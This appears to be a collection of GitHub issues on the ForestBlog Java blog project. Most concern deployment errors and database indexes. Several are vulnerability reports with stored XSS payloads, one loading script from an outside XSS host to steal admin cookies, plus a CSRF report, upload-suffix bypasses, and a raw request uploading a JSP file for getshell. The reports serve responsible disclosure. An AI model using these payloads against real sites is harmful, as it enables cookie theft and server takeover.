请问下，你这个博客界面主题是不是照抄了 知更鸟的 主题？

首先进入注册页面，昵称为任意的javascript代码，我这里以<script>alert(document.cookie)</script>为例获取cookie，真实的利用是将document.cookie的内容通过http请求发送到攻击者远程服务器保存，因为cookie里面包含用户名密码，所以xss攻击成功时攻击者也就获取到了用户/管理员的账号密码
English:First enter the registration page, the nickname is any javascript code, here I take <script>alert(document.cookie)</script> as an example to get the cookie. The real use is to send the content of document.cookie to the attacker through an http request The remote server saves, because the cookie contains the username and password, so when the xss attack is successful, the attacker also obtains the user/administrator's account password

注册完成后随便进入一篇文章随便评论
English:After the registration is completed, you can enter an article and comment at will

这个时候以下情况会触发xss：
English:At this time, the following conditions will trigger xss:
1.由于管理员界面会展示近期评论，故管理员登陆后台时会立即触发xss
English:1.Since the administrator interface will display recent comments, xss will be triggered immediately when the administrator logs in to the background


2.由于博客主页也会展示近期评论，故所有用户/管理员访问博客主页时会立即触发xss
English:2.Since the blog homepage also displays recent comments, xss is triggered immediately when all users/admins visit the blog homepage


3.由于攻击者在文章下面评论了，所以访问该文章也会立即触发xss
English:3.Since the attacker commented under the article, accessing the article also immediately triggers xss

故该漏洞危害非常大影响范围非常广利用难度非常低，除了获取所有用户/管理员的cookie外由于这儿的js代码是攻击者可以自定义的，恶意跳转等破坏站点完整性的情况也是存在的
English:Therefore, the vulnerability is very harmful and has a very wide scope of influence, and the difficulty of utilization is very low. In addition to obtaining the cookies of all users/administrators, since the js code here can be customized by the attacker, malicious jumps and other situations that destroy the integrity of the site also exist. of
修复建议：
English:Repair suggestion:
1.引入CSP策略，限制脚本加载(推荐，看之前也出现过很多次xss漏洞，一处一处修也麻烦，可能还有未知的地方存在xss，引入CSP并正确配置后XSS就可以全部避免)，次一点的办法是对用户输入的内容进行输出时进行html实体编码
English:1. Introduce CSP strategy to limit script loading (recommended, there have been many xss loopholes before, it is troublesome to repair one by one, there may be xss in unknown places, XSS can be completely avoided after CSP is introduced and configured correctly) , the next method is to perform html entity encoding when outputting the content input by the user
2.cookie中不存储明文的账号密码
English:2. The account password in plain text is not stored in the cookie

niehaoya

上传图片或更改文章列表的封面不能成功

Bug Report

I found stored-xss vulnerability in the website everywhere.
I run the project in my environment with tomcat.
In article comment editing , I insert some xss payload for my test.
payload: <img src=x onerror=alert(1) />


we can see the javascript payload is effective.
And then I test the name input, It also has the problem.

When the admin user logins in the site in background, it also strikes in the website.

使用maven创建骨架，产生了junit3.8.1依赖，同时自己添加了junit4.1.2依赖。可以删除冗余

感谢作者的无私奉献，这是一个非常好的学习ssm框架的项目。我也来班门弄斧一下：

在Admin/User/edit.jsp中第127行：

$("#userAvatar").attr("value", res.data.src);

下添加一行：

${userCustom.userAvatar} = res.data.src;

测试可行。

问题

表article中缺少一些需要的索引，通过测试，我们发现加上这些索引可以极大地提高相关查询的性能(高达80%)，需要添加的索引分别如下所示：

1.article.article_user_id

ArticleMapper#countByUser是根据用户id统计其文章数量，为比较常用的查询语句，在article_user_id上添加索引可以加快该查询的效率。

2.article.article_update_time

ArticleMapper#getLastUpdateArticle是获取最新更新的文章，为一条常用查询，在update_time字段添加索引可以很大程度上提升该语句的性能。

3.article.(article_order, article_id)

ArticleMapper#findAll实现的是根据条件查询article中的所有字段，为比较常用的查询语句，结果按照article_order和article_id来排序，在这两个字段上添加联合索引可以极大地提升该语句的查询效率。

4.article.article_title(FullText)

ArticleMapper#findAll的查询条件中常会带有关键字，会用其于article_title字段匹配，在实际使用中用关键字进行匹配文章是很常见的，因此应该为article_title添加全文索引从而加快相关查询。

解决方法

在下列字段添加索引
article.article_user_id
article_update_time
article_title
article.(article_order, article_id)

article_category_ref is an associative table of article and category, however it has neither primary key (on both columns) nor secondary index (in one of the two columns), which may affect performance when this table is large.

csrf vulnerability

In this vulnerability, if the admin user click the Fishing links the hacker provided, the it can generate a new user that can login in the website management background.

I review the code in the project, then I found that the code where the admin add other users, it has no protection for Cross-site request forgery.

so, I use burp to generate the CSRF Poc.

then, if the admin click the button(some csrf link), it generates a new user admin2 in the websie.

admin2 can login in the website background.

for more test, this vulnerability can also use to delete some user in the website.

HTTP Status 404 - /ForestBlog/

type Status report

message /ForestBlog/

description The requested resource is not available.

Apache Tomcat/7.0.64

org.apache.catalina.core.StandardContext.startInternal 一个或多个listeners启动失败，更多详细信息查看对应的容器日志文件
01-Mar-2021 02:26:56.896 严重 [RMI TCP Connection(2)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal 由于之前的错误，Context[]启动失败

大佬知道这是为什么吗？试了百度的方法也不行

1.support rss
2.support docker
thanks

配置好Tomcat之后启动保存了，想问下这是什么原因导致的

Tomcat版本

In this code, the verification suffix should verify the file type after the last point：
public final String allowSuffix = ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz";

/**
 * 上传文件
 *
 * @param file
 * @return
 * @throws IOException
 */
@RequestMapping(value = "/img", method = RequestMethod.POST)
public JsonResult uploadFile(@RequestParam("file") MultipartFile file) {

    //1.文件后缀过滤，只允许部分后缀
    //文件的完整名称,如spring.jpeg
    String filename = file.getOriginalFilename();
    //文件名,如spring
    String name = filename.substring(0, filename.indexOf("."));
    //文件后缀,如.jpeg
    String suffix = filename.substring(filename.lastIndexOf("."));

    if (allowSuffix.indexOf(suffix) == -1) {
        return new JsonResult().fail("不允许上传该后缀的文件！");
    }

example:

mysql默认存在user表，这个脚本的user表会覆盖mysql自带的，会引起权限问题，还请作者修改表名

Version:current
In the comment section of the article, when the user is not logged in, the comment needs to fill in the nickname, email address and website address. If XSS is changed, the vulnerability URL is http://ip:port/comment

After filling in the parameters, use burpsuite to capture the package, and modify the parameter value of the parameter commentauthoremail to < script /SRC=//xsshs.cn/h2X3 >It can not be directly used here document.cookie Get user cookie

When the background user clicks the comment to edit and save, XSS will be triggered. The vulnerability URL is http://ip:port//admin/comment/editSubmit

The XSS platform received a cookie from the background user

The source code for triggering the vulnerability is: \ForestBlog\src\main\java\com\liuyanzhao\ssm\blog\controller\admin\BackCommentController.java 110 lines of

导入以后出现这个错误不知道怎么解决。。。

1.Edit user information and save it

2.The profile picture address in the packet capture request is changed
payload:1" onerror=alert('xss') class="1

3.Any place where the user's avatar is loaded triggers a Cross Site Scripting

4.User information should be added and modified with XSS detection
src/main/java/com/liuyanzhao/ssm/blog/controller/admin/AdminController.java

问题

在如下三个实现分页查询的过程中会产生统计全表行数的语句

1.CommentServiceImpl#listCommentByPage

SELECT count(0) FROM comment

2.CategoryController#getArticleListByCategory

SELECT COUNT(*) FROM category

3.TagController#getArticleListByTag

SELECT COUNT(*) FROM tag

在InnoDB中不会缓存表的元数据，因此执行这样的语句会造成比较大的时间开销，而MyISAM则缓存有表的元数据，统计行数可以在很短的时间内完成。如果没有其它必须使用InnoDB的原因，建议修改表的存储引擎从而优化这类语句。
参考：https://dev.mysql.com/doc/refman/8.0/en/group-by-functions.html#function_count

解决方法

修改comment、category和tag表的存储引擎为MyISAM

Vulnerability Product:ForestBlog
Vulnerability version: all
Vulnerability type: Stored XSS
Vulnerability Details:

the Stored XSS payload could let admin causes disclosure of cookies、root path of websites、variables of PHP and stuff

1. Login link: http://forestblog.liuyanzhao.com/login
   I registered my own account here
   Account: linkk
   Password: linkk
   

2. When writing the article title or content, enter<script>alert (document. cookie)</script>
   Click to publish
   

3. Click on the homepage to view this article
   

Discovered that xss was triggered

嗨，您的博客很不错哦，我想问一下为什么不使用缓存(redis)呢

问题

表comment中缺少一些需要的索引，通过测试，我们发现加上这些索引可以极大地提高相关查询的性能(高达80%)，需要添加的索引分别如下所示：

1.comment.comment_article_id

CommentMapper#listCommentByArticleId为根据文章来查找相关评论，这无疑评论相关的一个比较频繁的查询，为了提高该查询的效率，应该在article_id字段添加索引。

2.comment.comment_pid

CommentMapper#listChildComment查询一条评论的子评论，同样也是一个比较常见的查询，因此值得在comment_pid字段添加索引从而加快该查询的速度。

解决方法

在下列字段添加索引
comment.comment_article_id
comment.comment_pid

• 环境

24-Feb-2018 17:05:22.430 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server version:        Apache Tomcat/8.5.28
24-Feb-2018 17:05:22.435 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server built:          Feb 6 2018 23:10:25 UTC
24-Feb-2018 17:05:22.435 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server number:         8.5.28.0
24-Feb-2018 17:05:22.435 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS Name:               Windows 10
24-Feb-2018 17:05:22.435 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS Version:            10.0
24-Feb-2018 17:05:22.435 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Architecture:          amd64
24-Feb-2018 17:05:22.436 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java Home:             C:\Program Files\Java\jdk1.8.0_161\jre
24-Feb-2018 17:05:22.436 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Version:           1.8.0_161-b12
24-Feb-2018 17:05:22.436 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Vendor:            Oracle Corporation
24-Feb-2018 17:05:22.436 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:         C:\Users\Avalon\.IntelliJIdea2017.3\system\tomcat\Unnamed_ForestBlog_2
24-Feb-2018 17:05:22.436 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:         C:\apache-tomcat-8.5.28

• 部分错误日志

Connected to server
[2018-02-24 05:05:24,164] Artifact ForestBlog:war: Artifact is being deployed, please wait...
24-Feb-2018 17:05:33.842 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Deploying web application directory [C:\apache-tomcat-8.5.28\webapps\manager]
24-Feb-2018 17:05:34.421 信息 [localhost-startStop-1] org.apache.catalina.startup.HostConfig.deployDirectory Deployment of web application directory [C:\apache-tomcat-8.5.28\webapps\manager] has finished in [578] ms
24-Feb-2018 17:05:40.018 信息 [RMI TCP Connection(3)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
log4j:WARN No appenders could be found for logger (org.springframework.web.context.ContextLoader).
log4j:WARN Please initialize the log4j system properly.
log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info.
24-Feb-2018 17:05:40.582 严重 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal One or more listeners failed to start. Full details will be found in the appropriate container log file
24-Feb-2018 17:05:40.583 严重 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal Context [] startup failed due to previous errors
[2018-02-24 05:05:40,759] Artifact ForestBlog:war: Error during artifact deployment. See server log for details.

暂时不知道问题出在哪，希望能够指导一下

没有别的意思 只是觉得看你其它的博客项目 都是新手小白项目 这也能赚钱吗？

后台头像处的基本资料点击会404，因为代码里admin/profile后面不需要再跟链接userId了，把超链接修改即可，望修复。谢谢！

第二个分支不是很懂能解释下吗？

ActicleMapper::listRandomArticle

SELECT
<include refid="Base_Column_List"/>
FROM
<include refid="tb"/>
WHERE article_status = 1
ORDER BY
RAND()
limit #{limit}

里用ORDER BY RAND()来取得随机的行。在article表比较大的情况下性能比较差，因为会进行全表扫描然后filesort。

可能的优化方法可以参考这个SO。

7-Nov-2019 21:01:56.241 警告 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.util.SessionIdGeneratorBase.createSecureRandom Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [227] milliseconds.
17-Nov-2019 21:01:56.243 严重 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.core.StandardContext.startInternal Context [] startup failed due to previous errors
17-Nov-2019 21:01:56.246 信息 [Catalina-utility-2] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [D:\apache-tomcat-9.0.26\webapps\manager]
17-Nov-2019 21:01:56.275 警告 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.loader.WebappClassLoaderBase.clearReferencesJdbc Web应用程序 [ROOT] 注册了JDBC驱动程序 [com.alibaba.druid.proxy.DruidDriver]，但在Web应用程序停止时无法注销它。 为防止内存泄漏，JDBC驱动程序已被强制取消注册。
17-Nov-2019 21:01:56.275 警告 [RMI TCP Connection(3)-127.0.0.1] org.apache.catalina.loader.WebappClassLoaderBase.clearReferencesJdbc Web应用程序 [ROOT] 注册了JDBC驱动程序 [com.mysql.cj.jdbc.Driver]，但在Web应用程序停止时无法注销它。 为防止内存泄漏，JDBC驱动程序已被强制取消注册。
[2019-11-17 09:01:56,307] Artifact ForestBlog:war exploded: Error during artifact deployment. See server log for details.
17-Nov-2019 21:01:56.371 信息 [Catalina-utility-2] org.apache.catalina.startup.HostConfig.deployDirectory Deployment of web application directory [D:\apache-tomcat-9.0.26\webapps\manager] has finished in [124] ms
[2019-11-17 09:01:56,400] Artifact uploads: Artifact is deployed successfully
[2019-11-17 09:01:56,401] Artifact uploads: Deploy took 9,903 milliseconds
17-Nov-2019 21:02:00.273 信息 [Abandoned connection cleanup thread] org.apache.catalina.loader.WebappClassLoaderBase.checkStateForResourceLoading Illegal access: this web application instance has been stopped already. Could not load []. The following stack trace is thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access.
java.lang.IllegalStateException: Illegal access: this web application instance has been stopped already. Could not load []. The following stack trace is thrown for debugging purposes as well as to attempt to terminate the thread which caused the illegal access.
at org.apache.catalina.loader.WebappClassLoaderBase.checkStateForResourceLoading(WebappClassLoaderBase.java:1385)
at org.apache.catalina.loader.WebappClassLoaderBase.getResource(WebappClassLoaderBase.java:1038)
at com.mysql.cj.jdbc.AbandonedConnectionCleanupThread.checkContextClassLoaders(AbandonedConnectionCleanupThread.java:96)
at com.mysql.cj.jdbc.AbandonedConnectionCleanupThread.run(AbandonedConnectionCleanupThread.java:69)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:834)
求助

In Windows system, we can upload any file by adding a "." after the file's name.

我调试了几天终于搞定，感谢up主。但是发现uploads/2018 文件夹里面有缺少入如07文件夹，缺失部分图片。up主可以上传全文件吗？谢谢

在后台删除全部文章后，分类里依然显示文章数，导致分类无法删除

MySql 版本：
select version();
+-----------+
| version() |
+-----------+
| 8.0.12 |
+-----------+
1 row in set (0.00 sec)

当前 8.0.12 MySql 环境下会报错：

2019-08-29 11:49:09,338 ERROR [com.alibaba.druid.pool.DruidDataSource] - init datasource error, url: jdbc:mysql://localhost:3306/forest_blog?useUnicode=true&characterEncoding=UTF-8&useSSL=false&serverTimezone=UTC
java.sql.SQLException: Could not retrieve transation read-only status server

Caused by: java.sql.SQLException: Could not retrieve transation read-only status server

替换两个 Jar ：

1. spring-jdbc
   屏蔽原来的：

        <!--<groupId>org.springframework</groupId>-->
        <!--<artifactId>spring-jdbc</artifactId>-->
        <!--<version>4.2.0.RELEASE</version>-->

添加新版本：

org.springframework
spring-jdbc
5.1.9.RELEASE

2. mysql-connector-java
   屏蔽原来的：

        <!--<groupId>mysql</groupId>-->
        <!--<artifactId>mysql-connector-java</artifactId>-->
        <!--<version>5.1.30</version>-->

添加新版本：

mysql
mysql-connector-java
8.0.17

老哥 js css img加载不出来 咋办

Description Resource Path Location Type
EL Syntax Error articleListByCategory.jsp /ForestBlog/src/main/webapp/WEB-INF/view/Home/Page line 0 JSP Problem

样式出不来

问题

表article_tag_ref中缺少一些需要的索引，通过测试，我们发现加上这些索引可以极大地提高相关查询的性能(高达80%)，需要添加的索引分别如下所示：

1.article_tag_ref.tag_id

ArticleTagRefMapper#countArticleByTagId会根据tag_id来统计记录数量，此外在ArticleMapper#findAll中会出现一个字句，根据tag_id查询对应相关的article_id，因此应该单独为tag_id加上索引从而加快这些查询的效率。

解决方法

在下列字段添加索引
article_tag_ref.tag_id

There is no character verification for the nickname of the registration interface

The administrator clicks the user function to pop up the XSS prompt box

前台搜索处有一个反射型xss

前台有一个发评论地址.

接收IP的代码

使用的是cn.hutool.http.HtmlUtil过滤 escape 方法过滤规则为

url在a标签href属性里面出现岂不是可以写伪协议进行xss.

进入后台首页,点击这个昵称

就成功触发了xss了

在管理评论列表页面,因为展示了ip信息所以就直接触发了.

后台写文章这里有一个上传功能.

文件名称写成带xss代码的文件名也是可以上传,例如.png也可以上传成功，但是这个功能只有后台才可以上传。

前台还有一个申请友链的地方.

There are any files uploaded in the background of your website, you can upload any files,like jsp and html. And this API don't need user login in, the file uploaded through here can be directly getshell, take over the web

example:
Upload picture:

Look at this interface's source code(/src/main/java/com/liuyanzhao/blog/controller/common/UploadFileController.java):

You konw,there are two questions.
(1)Don't need user login in
(2)Can upload any files at this interface.

Choose a picture upload,delete the Cookie,and modify the suffix. jsp,html,ext....

POST /uploadFile HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/admin/article/edit/38
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------895687275210314910246127694
Content-Length: 6887
DNT: 1
Connection: close
Cookie: JSESSIONID=; viewId=36; username=; password=

-----------------------------895687275210314910246127694
Content-Disposition: form-data; name="file"; filename="21.jsp"
Content-Type: image/png

<%out.println(1);%>
-----------------------------895687275210314910246127694--

we can visit it directly,

I think you should limit the type of file you upload

博主这个跳转的时候为什么会有php的链接啊

可以微信交流一下 我现在大四 在深圳实习 做的也是后台开发 你技术功底很好 明年春招去大厂实习吧